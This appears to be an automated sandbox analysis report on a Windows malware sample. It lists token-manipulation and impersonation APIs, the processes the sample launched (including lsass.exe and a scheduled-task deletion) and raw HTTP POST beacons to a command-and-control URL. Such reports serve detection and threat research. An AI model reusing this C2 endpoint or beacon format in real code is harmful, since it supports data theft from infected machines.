rpcrt4.dll.RpcBindingSetAuthInfoExW rpcrt4.dll.RpcBindingSetOption ole32.dll.CoCreateFreeThreadedMarshaler ole32.dll.CreateStreamOnHGlobal kernelbase.dll.InitializeAcl kernelbase.dll.AddAce kernel32.dll.OpenProcessToken kernelbase.dll.GetTokenInformation kernelbase.dll.DuplicateTokenEx kernelbase.dll.AdjustTokenPrivileges kernelbase.dll.AllocateAndInitializeSid kernelbase.dll.CheckTokenMembership kernel32.dll.SetThreadToken advapi32.dll.RegOpenKeyW ole32.dll.CLSIDFromString authz.dll.AuthzInitializeContextFromSid ole32.dll.CoGetCallContext ole32.dll.StringFromGUID2 ole32.dll.CoImpersonateClient ole32.dll.CoRevertToSelf ole32.dll.CoSwitchCallContext oleaut32.dll.#500 oleaut32.dll.#8
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe" C:\Windows\system32\lsass.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation C:\Windows\system32\sc.exe start w32time task_started C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART C:\Windows\System32\wsqmcons.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" \\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R C:\Windows\system32\wbem\wmiprvse.exe -Embedding
Started Services
VaultSvc W32Time
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:20:30 | 2018-09-09 19:24:18 | 228 |
2 HTTP Request(s) detected
http://blackdiamondsco.ae/trip/fre.php
- Hostname: blackdiamondsco.ae
- IP Address:
- Port: 80
- Count: 2
POST /trip/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: blackdiamondsco.ae Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 61B967EE Content-Length: 192 Connection: close
http://blackdiamondsco.ae/trip/fre.php
- Hostname: blackdiamondsco.ae
- IP Address:
- Port: 80
- Count: 15
POST /trip/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: blackdiamondsco.ae Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 61B967EE Content-Length: 165 Connection: close